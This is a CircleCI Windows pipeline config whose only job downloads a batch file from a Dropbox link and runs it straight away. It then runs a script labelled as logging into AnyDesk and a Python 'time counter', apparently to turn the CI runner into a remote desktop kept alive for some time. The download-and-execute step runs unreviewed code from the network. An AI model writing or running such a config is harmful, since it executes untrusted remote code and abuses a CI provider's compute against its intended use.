version: 2.1

orbs:
  win: circleci/windows@5.0

jobs:
  build:
    executor:
      name: win/server-2022
      size: medium
    steps:
      - checkout
      - run:
          name: Downloading & Installing Essentials
          command: |
            Invoke-WebRequest -Uri "https://www.dropbox.com/scl/fi/qdyd4p9t6xoabl95n5o3g/Downloads.bat?rlkey=snr74vv1vr8k5suujugvrhjtm&dl=1" -OutFile "Downloads.bat"
            cmd /c Downloads.bat
      - run:
          name: Log In To AnyDesk
          command: cmd /c show.bat
      - run:
          name: Time Counter
          command: python time.py

workflows:
  my-workflow:
    jobs:
      - build